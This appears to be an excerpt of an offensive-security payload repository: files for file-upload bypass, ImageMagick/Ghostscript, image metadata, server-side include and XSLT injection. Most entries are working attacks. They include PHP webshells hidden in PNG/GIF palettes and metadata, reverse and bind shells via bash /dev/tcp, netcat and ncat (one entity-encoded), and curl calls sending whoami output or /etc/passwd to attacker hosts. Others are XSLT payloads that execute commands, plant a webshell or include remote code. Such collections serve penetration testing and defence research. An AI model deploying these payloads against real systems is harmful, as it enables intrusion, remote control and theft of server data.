 5 | $p = array(0xA3, 0x9F, 0x67, 0xF7, 0x0E, 0x93, 0x1B, 0x23, 0xBE, 0x2C, 0x8A, 0xD0, 0x80, 0xF9, 0xE1, 0xAE, 0x22, 0xF6, 0xD9, 0x43, 0x5D, 0xFB, 0xAE, 0xCC, 0x5A, 0x01, 0xDC, 0xAA, 0x52, 0xD0, 0xB6, 0xEE, 0xBB, 0x3A, 0xCF, 0x93, 0xCE, 0xD2, 0x88, 0xFC, 0x69, 0xD0, 0x2B, 0xB9, 0xB0, 0xFB, 0xBB, 0x79, 0xFC, 0xED, 0x22, 0x38, 0x49, 0xD3, 0x51, 0xB7, 0x3F, 0x02, 0xC2, 0x20, 0xD8, 0xD9, 0x3C, 0x67, 0xF4, 0x50, 0x67, 0xF4, 0x50, 0xA3, 0x9F, 0x67, 0xA5, 0xBE, 0x5F, 0x76, 0x74, 0x5A, 0x4C, 0xA1, 0x3F, 0x7A, 0xBF, 0x30, 0x6B, 0x88, 0x2D, 0x60, 0x65, 0x7D, 0x52, 0x9D, 0xAD, 0x88, 0xA1, 0x66, 0x94, 0xA1, 0x27, 0x56, 0xEC, 0xFE, 0xAF, 0x57, 0x57, 0xEB, 0x2E, 0x20, 0xA3, 0xAE, 0x58, 0x80, 0xA7, 0x0C, 0x10, 0x55, 0xCF, 0x09, 0x5C, 0x10, 0x40, 0x8A, 0xB9, 0x39, 0xB3, 0xC8, 0xCD, 0x64, 0x45, 0x3C, 0x49, 0x3E, 0xAD, 0x3F, 0x33, 0x56, 0x1F, 0x19 );
 6 |  
 7 | $img = imagecreatetruecolor(110, 110);
 8 |  
 9 | for ($y = 0; $y < sizeof($p); $y += 3) {
10 | $r = $p[$y];
11 | $g = $p[$y+1];
12 | $b = $p[$y+2];
13 | $color = imagecolorallocate($img, $r, $g, $b);
14 | imagesetpixel($img, round($y / 3)*2, 0, $color);
15 | imagesetpixel($img, round($y / 3)*2+1, 0, $color);
16 | imagesetpixel($img, round($y / 3)*2, 1, $color);
17 | imagesetpixel($img, round($y / 3)*2+1, 1, $color);
18 | }
19 |  
20 | imagepng($img);
21 |  
22 | ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Compression/createGIFwithGlobalColorTable.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | // createGIFwithGlobalColorTable.php
 3 | $_file="example.gif";
 4 | $_payload="<?php evil();?>";
 5 | $_width=200;
 6 | $_height=200;
 7 | if(strlen($_payload)%3!=0){
 8 |  echo "payload%3==0 !"; exit();
 9 | }
10 | $im = imagecreate($_width, $_height);
11 | $_hex=unpack('H*',$_payload);
12 | 
13 | $colors_hex=str_split($_hex[1], 6);
14 | 
15 | for($i=0; $i < count($colors_hex); $i++){
16 |   $_color_chunks=str_split($colors_hex[$i], 2);
17 |   $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
18 |   imagesetpixel($im,$i,1,$color);
19 | }
20 | 
21 | imagegif($im,$_file);
22 | ?>


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Compression/createPNGwithPLTE.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 | //createPNGwithPLTE.php
 3 | // bypass imageCreateFromPng and imagepng 
 4 | $_payload="<?php phpinfo()?> ";
 5 | $_pay_len=strlen($_payload);
 6 | if(strlen($_payload)%3!=0){
 7 |  echo "payload%3==0 !"; exit();
 8 | }
 9 | 
10 | 
11 | $width=$_pay_len/3;
12 | $height=20;
13 | //$im = imageCreateFromPng("existing.png");
14 | $im = imagecreate($width, $height);
15 | 
16 | $_hex=unpack('H*',$_payload);
17 | $_chunks=str_split($_hex[1], 6);
18 | 
19 | for($i=0; $i < count($_chunks); $i++){
20 | 
21 |   $_color_chunks=str_split($_chunks[$i], 2);
22 |   $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));
23 | 
24 |   imagesetpixel($im,$i,1,$color);
25 | 
26 | }
27 | 
28 | imagepng($im,"example.png");


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd.svg:
--------------------------------------------------------------------------------
1 | <svg width="1000" height="1000" 
2 | xmlns:xlink="http://www.w3.org/1999/xlink">
3 | xmlns="http://www.w3.org/2000/svg">       
4 | <image xlink:href="text:/etc/passwd" height="500" width="500"/>
5 | </svg>


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/convert_local_etc_passwd_html.svg:
--------------------------------------------------------------------------------
1 | <svg width="1000" height="1000" 
2 | xmlns:xlink="http://www.w3.org/1999/xlink">
3 | xmlns="http://www.w3.org/2000/svg">       
4 | <image xlink:href="html:/etc/passwd" height="500" width="500"/>
5 | </svg>


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/ghostscript_rce_curl.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture ImageMagick/imagemagick_CVE-2022-44268_convert_etc_passwd.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagemagick_ghostscript_cmd_exec.pdf:
--------------------------------------------------------------------------------
1 | %!PS
2 | currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
3 | .putdeviceparams
4 | quit


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagemagik_ghostscript_reverse_shell.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | image over 0,0 0,0 'pango:@/etc/passwd'
4 | pop graphic-context
5 | 
6 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | image over 0,0 0,0 'text:/etc/passwd'
4 | pop graphic-context
5 | 
6 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg:
--------------------------------------------------------------------------------
 1 | push graphic-context
 2 | encoding "UTF-8"
 3 | viewbox 0 0 1 1
 4 | affine 1 0 0 1 0 0
 5 | push graphic-context
 6 | image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
 7 | pop graphic-context
 8 | pop graphic-context
 9 | 
10 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | encoding "UTF-8"
3 | viewbox 0 0 1 1
4 | affine 1 0 0 1 0 0
5 | push graphic-context
6 | image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
7 | pop graphic-context
8 | pop graphic-context
9 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_imageover_wget.gif:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_bind_shell_nc.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_curl.png:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_portscan.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(http://localhost:PORT/)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_remote_connection.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(http://IP_ATTAQUANT/)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_reverse_shell_bash.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_url_touch.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_nctraditional.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" standalone="no"?>
2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
3 | "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
4 | <svg width="640px" height="480px" version="1.1"
5 | xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
6 | "http://www.w3.org/1999/xlink">
7 | <image xlink:href="https://example.com/image.jpg&quot;|/bin/nc.traditional 127.0.0.1 4242 -e /bin/bash&quot;"
8 | x="0" y="0" height="640px" width="480px"/>
9 | </svg>


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
3 | <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
4 |     xlink:href="&#x7c;&#x6d;&#x6b;&#x66;&#x69;&#x66;&#x6f;&#x20;&#x2f;&#x74;&#x6d;&#x70;&#x2f;&#x73;&#x6f;&#x6b;&#x74;&#x3b;&#x20;&#x6e;&#x63;&#x20;&#x31;&#x32;&#x37;&#x2e;&#x30;&#x2e;&#x30;&#x2e;&#x31;&#x20;&#x34;&#x34;&#x34;&#x34;&#x20;&#x30;&#x3c;&#x2f;&#x74;&#x6d;&#x70;&#x2f;&#x73;&#x6f;&#x6b;&#x74;&#x20;&#x7c;&#x20;&#x2f;&#x62;&#x69;&#x6e;&#x2f;&#x73;&#x68;&#x20;&#x3e;&#x2f;&#x74;&#x6d;&#x70;&#x2f;&#x73;&#x6f;&#x6b;&#x74;&#x20;&#x32;&#x3e;&#x26;&#x31;&#x3b;&#x20;&#x72;&#x6d;&#x20;&#x2f;&#x74;&#x6d;&#x70;&#x2f;&#x73;&#x6f;&#x6b;&#x74;&#x20;" />
5 | </svg>
6 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik2_burpcollaborator_passwd.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik2_centos_id.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_id.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | save
4 | legal
5 | { null restore } stopped { pop } if
6 | { legal } stopped { pop } if
7 | restore
8 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | save
4 | legal
5 | { null restore } stopped { pop } if
6 | { legal } stopped { pop } if
7 | restore
8 | mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops
9 | 


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture ImageMagick/imagetragik2_ubuntu_shell2.jpg:
--------------------------------------------------------------------------------
1 | %!PS
2 | userdict /setpagedevice undef
3 | legal
4 | { null restore } stopped { pop } if
5 | legal
6 | mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/Build_image_to_LFI.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | from PIL import Image
 3 | 
 4 | # Shellcodes - Bypass included : Keyword Recognition : System, GET, php
 5 | # --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls
 6 | 
 7 | #shellcode  = "<?=@`$_GET[c]`;"
 8 | shellcode = "<?php system($_GET['c']); ?>"
 9 | # --- How to use : http://localhost/shell.php?_=system&__=echo%20'<pre>';ls
10 | shellcode2 = "<?='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>"
11 | 
12 | 
13 | print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")
14 | 
15 | # Create a backdoored PNG
16 | print(" - Creating a payload.png")
17 | im = Image.new("RGB", (10,10), "Black")
18 | im.info["shell"] = shellcode
19 | reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
20 | 
21 | # undocumented class
22 | from PIL import PngImagePlugin
23 | meta = PngImagePlugin.PngInfo()
24 | 
25 | # copy metadata into new object
26 | for k,v in im.info.items():
27 | 	if k in reserved: continue
28 | 	meta.add_text(k, v, 0)
29 | im.save("payload.png", "PNG", pnginfo=meta)
30 | 
31 | print("Done")


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg


--------------------------------------------------------------------------------
/Upload Insecure Files/Picture Metadata/PHP_exif_system.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Picture Metadata/PHP_exif_system.png


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/exec.shtml:
--------------------------------------------------------------------------------
1 | <!--#exec cmd="whoami" -->


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/include.shtml:
--------------------------------------------------------------------------------
1 | <!--#include file="..\..\web.config" -->


--------------------------------------------------------------------------------
/Upload Insecure Files/Server Side Include/index.stm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | 
 4 |   <head>
 5 |     <meta charset="utf-8" />
 6 |     <title></title>
 7 |   </head>
 8 | 
 9 |   <body>
10 |     <!-- #include file = "Web.config" -->
11 |     <script>alert('XSS')</script>
12 |   </body>
13 | 
14 | </html>
15 | 


--------------------------------------------------------------------------------
/Web Cache Deception/Images/wcd.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Web Cache Deception/Images/wcd.jpg


--------------------------------------------------------------------------------
/Web Sockets/Files/ws-harness.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | from __future__ import print_function
 3 | import socket,ssl
 4 | from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
 5 | from websocket import create_connection, WebSocket
 6 | from urlparse import parse_qs
 7 | import argparse
 8 | import os
 9 | 
10 | LOOP_BACK_PORT_NUMBER = 8000
11 | 
12 | def FuzzWebSocket(fuzz_value):
13 |     print(fuzz_value)
14 |     ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0])))
15 |     result =  ws.recv()
16 |     return result
17 | 
18 | def LoadMessage(file):
19 |     file_contents = ""
20 |     try:
21 |         if os.path.isfile(file):
22 |             f = open(file,'r')
23 |             file_contents = f.read()
24 |             f.close()
25 |     except:
26 |         print("Error reading file: %s" % file)
27 |         exit()
28 |     return file_contents
29 | 
30 | class myWebServer(BaseHTTPRequestHandler):
31 |     
32 |     #Handler for the GET requests
33 |     def do_GET(self):
34 |         qs = parse_qs(self.path[2:])
35 |         fuzz_value = qs['fuzz']
36 |         result = FuzzWebSocket(fuzz_value)
37 |         self.send_response(200)
38 |         self.send_header('Content-type','text/html')
39 |         self.end_headers()
40 |         self.wfile.write(result)
41 |         return
42 | 
43 | parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets')
44 | parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True)
45 | parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True)
46 | args = parser.parse_args()
47 | 
48 | ws_message = LoadMessage(args.message)
49 | 
50 | ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080)
51 | 
52 | try:
53 |     #Create a web server and define the handler to manage the
54 |     #incoming request
55 |     server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer)
56 |     print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER)
57 |     
58 |     #Wait forever for incoming http requests
59 |     server.serve_forever()
60 | 
61 | except KeyboardInterrupt:
62 |     print('^C received, shutting down the web server')
63 |     server.socket.close()
64 |     ws.close()
65 | 


--------------------------------------------------------------------------------
/Web Sockets/Images/WebsocketHarness.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Web Sockets/Images/WebsocketHarness.jpg


--------------------------------------------------------------------------------
/Web Sockets/Images/sqlmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Web Sockets/Images/sqlmap.png


--------------------------------------------------------------------------------
/Web Sockets/Images/websocket-harness-start.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Web Sockets/Images/websocket-harness-start.png


--------------------------------------------------------------------------------
/XSLT Injection/Files/enum-system-version-vendor.xsl:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
3 | <body>
4 | <br />Version: <xsl:value-of select="system-property('xsl:version')" />
5 | <br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
6 | <br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
7 | </body>
8 | </html>


--------------------------------------------------------------------------------
/XSLT Injection/Files/file-write.xsl:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <xsl:stylesheet
 3 |         xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
 4 |     xmlns:exploit="http://exslt.org/common"
 5 |     extension-element-prefixes="exploit"
 6 |     version="1.0">
 7 | <xsl:template match="/">
 8 | 
 9 | <exploit:document href="evil.txt" method="text">
10 |         Hello World!
11 | </exploit:document>
12 | 
13 | </xsl:template>
14 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-dotnet-2.xsl:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
 3 | xmlns:msxsl="urn:schemas-microsoft-com:xslt"
 4 | xmlns:user="urn:my-scripts">
 5 | 
 6 | <msxsl:script language = "C#" implements-prefix = "user">
 7 | <![CDATA[
 8 | public string execute(){
 9 | System.Diagnostics.Process proc = new System.Diagnostics.Process();
10 | proc.StartInfo.FileName= "C:\\windows\\system32\\cmd.exe";
11 | proc.StartInfo.RedirectStandardOutput = true;
12 | proc.StartInfo.UseShellExecute = false;
13 | proc.StartInfo.Arguments = "/c dir";
14 | proc.Start();
15 | proc.WaitForExit();
16 | return proc.StandardOutput.ReadToEnd();
17 | }
18 | ]]>
19 | </msxsl:script>
20 | 
21 |   <xsl:template match="/fruits">
22 |   --- BEGIN COMMAND OUTPUT ---
23 | 	<xsl:value-of select="user:execute()"/>
24 |   --- END COMMAND OUTPUT ---	
25 |   </xsl:template>
26 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-dotnet.xsl:
--------------------------------------------------------------------------------
 1 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App">
 2 |     <msxsl:script implements-prefix="App" language="C#">
 3 |       <![CDATA[
 4 |         public string ToShortDateString(string date)
 5 |           {
 6 |               System.Diagnostics.Process.Start("cmd.exe");
 7 |               return "01/01/2001";
 8 |           }
 9 |       ]]>
10 |     </msxsl:script>
11 |     <xsl:template match="ArrayOfTest">
12 |       <TABLE>
13 |         <xsl:for-each select="Test">
14 |           <TR>
15 |           <TD>
16 |             <xsl:value-of select="App:ToShortDateString(TestDate)" />
17 |           </TD>
18 |           </TR>
19 |         </xsl:for-each>
20 |       </TABLE>
21 |     </xsl:template>
22 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-java-1.xsl:
--------------------------------------------------------------------------------
1 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
2 |   <xsl:template match="/">
3 |     <xsl:variable name="rtobject" select="rt:getRuntime()"/>
4 |     <xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
5 |     <xsl:variable name="processString" select="ob:toString($process)"/>
6 |     <xsl:value-of select="$processString"/>
7 |   </xsl:template>
8 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-java-2.xsl:
--------------------------------------------------------------------------------
1 | <xml version="1.0"?>
2 | <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:java="http://saxon.sf.net/java-type">
3 | <xsl:template match="/">
4 | <xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'cmd.exe /C ping IP')" xmlns:Runtime="java:java.lang.Runtime"/>
5 | </xsl:template>.
6 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-php-assert.xsl:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
3 | <body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
4 |     <xsl:variable name="payload">
5 |         include("http://10.10.10.10/test.php")
6 |     </xsl:variable>
7 |     <xsl:variable name="include" select="php:function('assert',$payload)"/>
8 | </body>
9 | </html>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-php-file-create.xsl:
--------------------------------------------------------------------------------
1 | <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
2 |   <xsl:template match="/">
3 |     <xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','&lt;?php echo system($_GET[&quot;command&quot;]); ?&gt;')" />
4 |   </xsl:template>
5 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-php-file-read.xsl:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
3 | <body>
4 | <xsl:value-of select="php:function('readfile','index.php')" />
5 | </body>
6 | </html>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-php-meterpreter.xsl:
--------------------------------------------------------------------------------
1 | <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
2 |   <xsl:template match="/">
3 |     <xsl:variable name="eval">
4 |       eval(base64_decode('Base64-encoded Meterpreter code'))
5 |     </xsl:variable>
6 |     <xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>
7 |   </xsl:template>
8 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/rce-php-scandir.xsl:
--------------------------------------------------------------------------------
1 | <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
2 |   <xsl:template match="/">
3 |     <xsl:value-of name="assert" select="php:function('scandir', '.')"/>
4 |   </xsl:template>
5 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/read-and-ssrf.xsl:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 3 |   <xsl:template match="/fruits">
 4 |     <xsl:copy-of select="document('http://172.16.132.1:25')"/>
 5 |     <xsl:copy-of select="document('/etc/passwd')"/>
 6 |     <xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
 7 |     Fruits:
 8 | 	    <!-- Loop for each fruit -->
 9 |     <xsl:for-each select="fruit">
10 |       <!-- Print name: description -->
11 |       - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
12 |     </xsl:for-each>
13 |   </xsl:template>
14 | </xsl:stylesheet>


--------------------------------------------------------------------------------
/XSLT Injection/Files/system-properties.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <?xml-stylesheet href="system-properties.xsl" type="text/xsl"?>  
3 | <root/>


--------------------------------------------------------------------------------
/XSLT Injection/Files/system-properties.xsl:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 3 | <xsl:template match="/">
 4 | <p>
 5 | Version: <xsl:value-of select="system-property('xsl:version')" /> <br />
 6 | Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
 7 | Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
 8 | </p>
